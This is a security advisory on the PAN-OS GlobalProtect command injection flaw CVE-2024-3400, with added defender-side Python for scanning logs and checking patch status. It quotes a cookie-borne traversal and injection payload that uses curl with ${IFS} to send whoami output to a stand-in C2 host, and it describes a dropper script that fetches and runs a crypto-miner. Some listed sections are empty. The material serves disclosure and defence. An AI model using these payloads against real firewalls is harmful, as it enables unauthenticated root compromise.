PAN-OS Command Injection (CVE-2024-3400)

Written by: James Rowley

Executive Summary 

On the 10th of April 2024, cybersecurity firm Volexity detected a zero-day vulnerability in the GlobalProtect feature of Palo Alto Networks’ PAN-OS. The vulnerability was being exploited by a threat actor, tracked as UTA0218, who was able to remotely compromise a firewall device, create a reverse shell and download additional tools onto the device. The attacker’s primary focus was exporting configuration data from the devices and using it as an entry point for lateral movement within the victim organisations. 

Volexity collaborated with Palo Alto Networks Product Security Incident Response Team (PSIRT) to investigate the compromise. During the investigation, Volexity observed that UTA0218 attempted and failed to install a custom Python backdoor, named “UPSTYLE”, on the firewall. The purpose of this backdoor was to allow the attacker to execute additional commands on the device via specially crafted network requests. 

Volexity discovered successful exploitation at multiple organisations dating back to the 26th of March. These attempts appear to be the threat actor testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability. On the 7th of April, Volexity observed the attacker attempting and failing to deploy a backdoor on a customer’s firewall device and three days later, UTA0218 was observed exploiting firewall devices and successfully deploying malicious payloads. 

After successful exploitation, UTA0218 downloaded additional tooling from remote servers they controlled to facilitate access to victims’ internal networks. They quickly moved laterally through victims’ networks, extracting sensitive credentials and other files that would enable access during and potentially after the intrusion. The tradecraft and speed employed by the attacker suggest a competent threat actor with a clear playbook. 

Since the vulnerability was identified, numerous proof-of-concept examples have been released and it is currently under active exploitation by threat actors throughout the world. The vulnerability has been confirmed as an OS command injection issue and assigned the identifier CVE-2024-3400. It is an unauthenticated remote code execution vulnerability with a CVSS base score of 10.0. Palo Alto Networks has issued an advisory for CVE-2024-3400 and released a fix for all affected versions of PAN-OS on the 14th of April 2024. 

Affected Software/Systems 

This vulnerability affects only firewalls running PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 that are configured with a GlobalProtect gateway, a GlobalProtect portal, or both. Note that PAN-OS firewalls remain susceptible to this vulnerability even when device telemetry is disabled.

Affected Versions

Discovery 

On the 10th of April 2024, zero-day exploitation of a vulnerability within the GlobalProtect feature of Palo Alto Networks PAN-OS was detected during network security monitoring operations. Suspicious network traffic from a monitored firewall triggered alerts, and an initial investigation confirmed the device’s compromise. The following day, identical exploitation by the same threat actor was observed in another operation.

As the investigation broadened, successful breaches at various clients and organizations were discovered, dating back to the 26th of March. These breaches appeared to be the threat actor’s attempts to test the vulnerability by placing zero-byte files on firewall devices. On the 7th of April, an unsuccessful attempt to install a backdoor on a client’s firewall device was observed. However, by the 10th, the threat actor had successfully delivered malicious payloads by exploiting firewall devices. A similar breach was observed the next day. 

Following the exploitation, the threat actor downloaded additional tools from their controlled servers to facilitate access to the victims’ networks. They swiftly navigated through the networks, gathering sensitive credentials and other files that could facilitate access during and possibly after the breach. 

The attacker’s speed and methods indicate the involvement of a highly skilled threat actor with a well-defined plan. At present, it’s not possible to estimate the full extent of the initial exploitation, but it’s probable that the exploitation was restricted and targeted. 

Proof of Concept 

It has been determined that the threat is an exploit chain made up of two separate vulnerabilities: a path traversal vulnerability in the GlobalProtect web server, and a command injection vulnerability in the device telemetry feature.

Path Traversal 

In this HTTP request, the Cookie header carries a path traversal payload: 

This payload aims to generate a file named poc.txt in the given directory: “/var/appweb/sslvpndocs/global-protect/portal/images/” with root permissions. 

To verify the vulnerability, another HTTP request is sent to access the newly created file: 

If the system is vulnerable, it will return a 403 status code (Forbidden) when trying to access the poc.txt file, contrary to the anticipated 404 status code (Not Found). 

Command Injection 

In this HTTP request, a command injection payload is incorporated in the Cookie header and placed within the directory “/../../../opt/panlogs/tmp/device_telemetry/minute/h4”. This directory is associated with a cron job which runs every minute.

The payload, represented as “curl${IFS}http://C2?test=$(whoami)`;”, uses the curl command to send an HTTP request to an attacker-controlled domain, with the output of the whoami command appended as a query parameter. It employs the Internal Field Separator (${IFS}) in place of a space to bypass filters that might block spaces.

If the system is open to attack, the payload will run the whoami command and send the result to http://C2, a domain the attacker controls. If the server responds with the output of the whoami command, the system is vulnerable and open to further exploitation. 
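The two indicators described above, traversal sequences in the Cookie header and `${IFS}`-style obfuscation of a shell command aimed at the device telemetry directory, can be checked for in web-server or WAF access logs. The following Python scanner is an added defender-side example and is not code from the original article. The log format, the cookie name `session`, the source addresses and the sample log lines are constructed for this example; the payload shapes follow the request descriptions above.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Each line is a
# combined-format entry with the request's Cookie header appended as the
# final quoted field; the cookie name "session" is a placeholder.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2024:12:00:01 +0000] "GET /global-protect/login.esp HTTP/1.1" 200 5123 "session=abcdef0123456789"
203.0.113.77 - - [10/Apr/2024:12:00:02 +0000] "POST /global-protect/portal/ HTTP/1.1" 403 0 "session=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt"
203.0.113.77 - - [10/Apr/2024:12:01:02 +0000] "POST /global-protect/portal/ HTTP/1.1" 403 0 "session=/../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}http://C2?test=$(whoami)`;"
203.0.113.77 - - [10/Apr/2024:12:01:30 +0000] "POST /global-protect/portal/ HTTP/1.1" 403 0 "session=%2F..%2F..%2F..%2Fopt%2Fpanlogs%2Ftmp%2Fdevice_telemetry%2Fminute%2Fh4"
198.51.100.5 - - [10/Apr/2024:12:02:00 +0000] "GET /global-protect/portal/images/logo.png HTTP/1.1" 200 1024 "-"
"""

# Log line layout assumed by this example (see SAMPLE_LOG above).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<cookie>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\.[/\\]')          # "../" or "..\" anywhere in the value
IFS_RE = re.compile(r'\$\{?IFS\}?')               # ${IFS} or $IFS used as a space
SHELL_META_RE = re.compile(r'\$\(|`|\||&&')       # command substitution / chaining
DOWNLOADER_RE = re.compile(r'\b(?:curl|wget)\s')  # fetch tool followed by an argument
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/"  # cron-scanned directory named above


def normalize(raw: str) -> str:
    """Undo the encodings an attacker may layer on the cookie: URL-encoding
    (applied twice to also catch double-encoding) and ${IFS} standing in
    for a space, the filter-bypass trick described in the article."""
    decoded = unquote(unquote(raw))
    return IFS_RE.sub(" ", decoded)


def classify(cookie_header: str) -> List[str]:
    """Return the indicators found in one Cookie header value, in a fixed
    order. The whole header is scanned rather than individual cookies,
    because an injected payload can itself contain ';' separators."""
    norm = normalize(cookie_header)
    indicators = []
    if TRAVERSAL_RE.search(norm):
        indicators.append("path_traversal")
    if TELEMETRY_DIR in norm:
        indicators.append("telemetry_dir_write")
    if SHELL_META_RE.search(norm):
        indicators.append("shell_metachar")
    if DOWNLOADER_RE.search(norm):
        indicators.append("downloader_in_cookie")
    return indicators


def scan(log_text: str) -> List[Dict]:
    """Parse each log line and report those whose Cookie header carries
    at least one indicator. Lines that do not match the format or carry
    no cookie are skipped."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m or m["cookie"] == "-":
            continue
        indicators = classify(m["cookie"])
        if indicators:
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "path": m["path"],
                "status": int(m["status"]),
                "indicators": indicators,
            })
    return findings


def by_source(findings: List[Dict]) -> Dict[str, int]:
    """Count suspicious requests per source address for triage."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f)
    print("per source:", by_source(results))
```

The decoding step matters more than the pattern list: a rule that looks for a literal `../` or `curl ` in the raw header misses the URL-encoded and `${IFS}`-obfuscated forms, which is exactly the evasion the write-up describes. A 403 on these requests is also consistent with the behaviour noted in the path traversal section, so the status code alone should not be read as the request having been blocked.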

Observations 

CSA has observed several instances of this vulnerability being actively exploited in an attempt to infect its clients with malware. 

Analysis of a client's Azure Web Application Firewall logs reveals a request made to a web server with a crafted payload in an attempt to download a bash script. 

This script is designed to download and execute a file from a remote server based on the host system’s architecture. It first identifies the system’s architecture and checks for writable directories. It then removes any existing files with the same name as the one it intends to download. Depending on the system’s architecture, it downloads a specific file from a remote server using either wget or curl. If the system’s architecture doesn’t match any of the specified ones, it attempts to download files for all architectures. Finally, it executes the downloaded file. 

Malicious Script

Sandbox analysis of the downloaded ELF file reveals that it is a strain of the crypto-mining malware Redtail. The use of Redtail on an always-on firewall is a tactic that not only compromises the firewall's security integrity but also generates a revenue stream for a threat actor and is highly unlikely to be detected for some time. 

Observations such as these demonstrate that malicious actors are already actively exploiting this vulnerability as a means to gain an initial foothold in victim networks. 

Impact 

It is unclear at the time of writing how many successful attacks have been initiated. However, the organisation ShadowServer has reported that roughly 22,542 PAN-OS firewall instances are still exposed on the internet. Most of the devices are located in the United States (9,620), followed by Japan (960), India (890), Germany (790), the UK (780), Canada (620), Australia (580), and France (500).

Impact as reported by ShadowServer

Despite the presence of a considerable number of firewalls that could potentially be vulnerable, it has been reported that about 73% of all exposed PAN-OS systems received patches within a week. 

CVSS Score 

The discovery and reporting of this vulnerability were initially made by Volexity on the 10th of April 2024. Following this, the Cybersecurity and Infrastructure Security Agency (CISA) incorporated CVE-2024-3400 into its Known Exploited Vulnerability Catalog on the 12th of April 2024. This flaw has been assigned the highest severity rating of 10.0 as it provides an unauthenticated user with the capability to execute arbitrary commands on the target system with root-level privileges. 

Indicators of Compromise

Mitigation/Remediation Steps 

Upgrading to a patched version of PAN-OS can enhance device security, even when workarounds and mitigations have been implemented. The issue has been addressed in the following hotfix releases: 

In previous advisories, disabling device telemetry was suggested as an additional mitigation measure. This is no longer considered effective: PAN-OS firewalls remain exposed to attacks related to this vulnerability irrespective of whether device telemetry is enabled.
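Because the fixes were shipped as hotfix builds (versions with an `-hN` suffix) for each affected maintenance release, a naive string comparison of `sw-version` can misjudge patch status. The following Python helper is an added example, not code from the original article or from Palo Alto Networks: it reads the `sw-version` field from `show system info` output, orders a base release below its own hotfixes, and checks the installed build against a table of first-fixed hotfixes keyed by maintenance release. The table values (`10.2.99-h1`, `11.1.99-h3`), the hostname and the CLI output are constructed placeholders; the real fixed releases must be taken from the vendor advisory for CVE-2024-3400.

```python
import re
from typing import Dict, Optional, Tuple

# Release trains named in the article as affected when a GlobalProtect
# portal or gateway is configured.
AFFECTED_TRAINS = {"10.2", "11.0", "11.1"}

# PLACEHOLDER table for demonstration only: maps a maintenance release to the
# first hotfix that contains the fix. Populate it from the vendor advisory;
# these constructed entries are not real PAN-OS releases.
EXAMPLE_FIXED_HOTFIXES: Dict[str, str] = {
    "10.2.99": "10.2.99-h1",
    "11.1.99": "11.1.99-h3",
}

# Constructed `show system info` output (only the fields this example reads).
SAMPLE_SHOW_SYSTEM_INFO = """\
hostname: fw-edge-01
sw-version: 10.2.99
"""

VERSION_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$')


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """Turn a PAN-OS version such as "11.1.2-h3" into a comparable tuple
    (major, minor, maintenance, hotfix). A release without an -h suffix is
    hotfix 0, so "10.2.99" sorts below "10.2.99-h1" as it should."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def sw_version_from_show_system_info(output: str) -> Optional[str]:
    """Pull the value of the sw-version line out of `show system info` output."""
    for line in output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "sw-version":
            return value.strip()
    return None


def assess(installed: str, fixed_hotfixes: Dict[str, str]) -> str:
    """Classify an installed build as one of:
      not_affected  - release train is not in scope for this CVE
      unknown       - affected train, but no table entry for this
                      maintenance release (consult the advisory)
      needs_upgrade - affected build older than the first fixed hotfix
      patched       - at or above the first fixed hotfix
    """
    v = parse_version(installed)
    train = f"{v[0]}.{v[1]}"
    if train not in AFFECTED_TRAINS:
        return "not_affected"
    maintenance = f"{v[0]}.{v[1]}.{v[2]}"
    fixed = fixed_hotfixes.get(maintenance)
    if fixed is None:
        return "unknown"
    return "patched" if v >= parse_version(fixed) else "needs_upgrade"


if __name__ == "__main__":
    installed = sw_version_from_show_system_info(SAMPLE_SHOW_SYSTEM_INFO)
    print(installed, "->", assess(installed, EXAMPLE_FIXED_HOTFIXES))
```

The "unknown" outcome is deliberate: an affected train with no matching table entry should be escalated to a person reading the advisory, not silently treated as patched.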

References 
